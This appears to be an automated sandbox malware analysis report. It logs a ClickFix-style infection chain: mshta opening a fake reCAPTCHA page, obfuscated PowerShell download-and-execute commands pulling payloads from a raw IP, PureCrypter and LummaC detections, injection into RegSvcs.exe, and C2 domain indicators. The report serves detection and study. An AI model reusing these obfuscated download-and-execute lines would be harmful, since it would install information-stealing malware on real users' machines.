                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                  Source: powershell.exe, 00000008.00000002.58462627995.00000199FF735000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllU
                  Source: mshta.exe, 00000003.00000003.58280651620.00000248D9998000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.58302794613.00000248D9998000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWm
                  Source: powershell.exe, 00000004.00000002.58389738530.0000015EAAF8C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWC{|F%SystemRoot%\system32\mswsock.dll
                  Source: RegSvcs.exe, 0000000E.00000002.58328295441.0000000000AA6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWJm9
                  Source: mshta.exe, 00000003.00000002.58305312624.00000250DC660000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.58302794613.00000248D9936000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58280651620.00000248D9933000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.58328295441.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.58324720356.0000000000A50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: powershell.exe, 00000006.00000002.58452952666.0000025BB021E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWf
                  Source: RegSvcs.exe, 0000000C.00000002.59494604546.0000000000D3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004402D0 LdrInitializeThunk,14_2_004402D0
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Yara detected Powershell download and execute
                  Source: Yara matchFile source: amsi64_8332.amsi.csv, type: OTHER
                  Source: Yara matchFile source: amsi64_8400.amsi.csv, type: OTHER
                  Source: Yara matchFile source: amsi64_8460.amsi.csv, type: OTHER
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8332, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8400, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8460, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 8996, type: MEMORYSTR
                  Detected PureCrypter Trojan
                  Source: RegSvcs.exe, 0000000C.00000002.59499668768.0000000002A1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 92.255.57.112MIIE3jCCAsagAwIBAgIQAMyl7gKxD8R/bGWvMD10ZTANBgkqhkiG9w0BAQ0FADAQMQ4wDAYDVQQDDAVXaXB3dzAgFw0yNTAxMDMwMDU2NDNaGA85OTk5MTIzMTIzNTk1OVowEDEOMAwGA1UEAwwFV2lwd3cwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQCJBHoD8dGnUp6uYikMPGLQueXv2m1Xu0heqNGi2rCJpNYbl6KI9IV6SjdkExryLeKPYYSlWJ7DpE1Q7MIziyKNfFegW9a8TG2e/iEzAEo/tpV7x9RPIcRQ/edfva5A7UXDwXtDOBoYut0QSFv09mPd+CTwBK2QBs0oGsqD/xOsjVYJJ4KX1Hd96OdFoMaocbr2/5Vd8byNHtQ+l5gorVyZF2uB8sq3Atk6wnNCp2LpnVn0fLwXr1M5IrgyIGBJlxgnApZhEK4fw9312ERy4LBTeYPi0l4CWlSHSZtthWyfNpn0jl+yg+C6nt4Ty6Ddbs9Ch014fZot/dxSYY4HaEpGNiLJ6+wDTmiTtxPBYp9q6+zAR9HhQdrby9L2vhbmIbbVrD3TR+5TcegrQ8itsRmEzDIS+F7fnCxwtWuYfDYXSl0bjIgMfCzROhBr2AAWjU8YQLZjaeJ1AdBHDnwNXYeT75YAbl8ZjtKlQVknG+OW3CwtOxSQZ+fxg4ksAiddtvvGH3e4sqkmwEhX4YOTN3F+ueUINzIPBqLNOhwezuUzyOVedqJhEspsMOG7tN+2HOjLyMUxyT46zfa4feCZap9mmcxW1nTePXW5pSlWxOa4+PG+BOr0Cc7bPmTwBSWNnKy1dDVQyCuazmo9qJ7F9JaEW3tYtqjJheI8dPTlNcCbIwIDAQABozIwMDAdBgNVHQ4EFgQU6wPCBOLkp1AKy1BgfeO7G7mU/9wwDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQ0FAAOCAgEAIOkGO4X8MYgfkdBrYh0KLj11P8ETDbp9EokYcLU3xGh3qtdYRakKdtz4V2GwCWauK0sbOzIWqm+0nuF1BFG4Ff/n90e8zQy4Dx1HkrG+A/4NRiq/1ZRcUhXcEOCbCQlhREZtin6BwTno5ypVaqtWI7ip+OZZruNvVLAQaR2wPKe9W8M+ACn8ipeXGmtow9rqpnUM0KCgT36+TkDyiz6RqBxWjiyDWoodnkxuqrffZdMrob7FxYxWlXK9ODtx/88FBHz0wabvGFkHlWNAUr3BTBMyOyZZTOn08RLKDw90Uj/e9vQf9AutujdJtyhuXL/qbBVOa0bWHIbEdai5rFwo17XMBQhcVDD7cKi4UxpxdviOT3t0ALlE8Zw/NDNz/a0u+bQL3rP7+KCy4X9FidO6umTIoWRv8OSotXX+TsJf+HtG9/nBxEnBF0URXzzCTb20vTtrqfr0zeuZIZN/B0zU68bFS0FycEJVD1y47yhsBThhEVvUMWIYu/RlEENmiT5KYoHD6mcNEXvOUXYFHSiNhNP3ocZAAEirBiZWk2i/mwwd1iL6baDKt+7btwWjUUvqDtnZThWLXjsKkvk84tfiEwVBzZiv3tHotXZB6Y+ILVrE9HdE2I0zyhWIrVRE+tNQxTwb49fLxIF+SoF4K3lYK5Gnp4JYord3Uhmhmm9mZGo="Default:BAPPDATAJ3e74489724f9
                  Injects a PE file into a foreign processes
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                  LummaC encrypted strings found
                  Source: powershell.exe, 00000008.00000002.58308550972.00000199804A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: finickypwk.lat
                  Source: powershell.exe, 00000008.00000002.58308550972.00000199804A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: shoefeatthe.lat
                  Source: powershell.exe, 00000008.00000002.58308550972.00000199804A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: savorraiykj.lat
                  Source: powershell.exe, 00000008.00000002.58308550972.00000199804A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: kickykiduz.lat
                  Source: powershell.exe, 00000008.00000002.58308550972.00000199804A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: miniatureyu.lat
                  Source: powershell.exe, 00000008.00000002.58308550972.00000199804A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: leggelatez.lat
                  Source: powershell.exe, 00000008.00000002.58308550972.00000199804A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: washyceehsu.lat
                  Source: powershell.exe, 00000008.00000002.58308550972.00000199804A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: bloodyswif.lat
                  Source: powershell.exe, 00000008.00000002.58308550972.00000199804A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: curtainykeo.lat
                  Writes to foreign memory regions
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 404000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 406000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 78A008Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 44E000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 450000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 803008Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 444000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 446000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 454000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 77E008Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://view-reserve.com/recaptcha-verify.htmlJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X Jump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X Jump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $c1='%%(n%%ew-o%%%bje%%%ct n%%%et.w%%%e'; $c4='b%%cl%%%%ie%%nt%%).%%%d%%%ow%nl%%o%%'; $c3='a%%dst%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/1.png'')';$tc=($c1,$c4,$c3 -join '');$tc=$tc.replace('%','');i`e`x $tc|i`e`x
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $c1='%%(n%%ew-o%%%bje%%%ct n%%%et.w%%%e'; $c4='b%%cl%%%%ie%%nt%%).%%%d%%%ow%nl%%o%%'; $c3='a%%dst%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/2.png'')';$tc=($c1,$c4,$c3 -join '');$tc=$tc.replace('%','');i`e`x $tc|i`e`x
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $c1='%%(n%%ew-o%%%bje%%%ct n%%%et.w%%%e'; $c4='b%%cl%%%%ie%%nt%%).%%%d%%%ow%nl%%o%%'; $c3='a%%dst%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/3.png'')';$tc=($c1,$c4,$c3 -join '');$tc=$tc.replace('%','');i`e`x $tc|i`e`x
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $c1='%%(n%%ew-o%%%bje%%%ct n%%%et.w%%%e'; $c4='b%%cl%%%%ie%%nt%%).%%%d%%%ow%nl%%o%%'; $c3='a%%dst%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/1.png'')';$tc=($c1,$c4,$c3 -join '');$tc=$tc.replace('%','');i`e`x $tc|i`e`x Jump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $c1='%%(n%%ew-o%%%bje%%%ct n%%%et.w%%%e'; $c4='b%%cl%%%%ie%%nt%%).%%%d%%%ow%nl%%o%%'; $c3='a%%dst%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/2.png'')';$tc=($c1,$c4,$c3 -join '');$tc=$tc.replace('%','');i`e`x $tc|i`e`x Jump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $c1='%%(n%%ew-o%%%bje%%%ct n%%%et.w%%%e'; $c4='b%%cl%%%%ie%%nt%%).%%%d%%%ow%nl%%o%%'; $c3='a%%dst%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/3.png'')';$tc=($c1,$c4,$c3 -join '');$tc=$tc.replace('%','');i`e`x $tc|i`e`x Jump to behavior
                  Source: RegSvcs.exe, 0000000C.00000002.59499668768.0000000002E3C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.59499668768.0000000002D7C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.59499668768.0000000002E14000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                  Source: RegSvcs.exe, 0000000C.00000002.59499668768.0000000002E3C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.59499668768.0000000002D7C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.59499668768.0000000002E14000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager*
                  Source: RegSvcs.exe, 0000000C.00000002.59499668768.0000000002D7C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managerh{
                  Source: RegSvcs.exe, 0000000C.00000002.59499668768.0000000002E3C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.59499668768.0000000002E14000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.59499668768.0000000002DCA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerTe
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
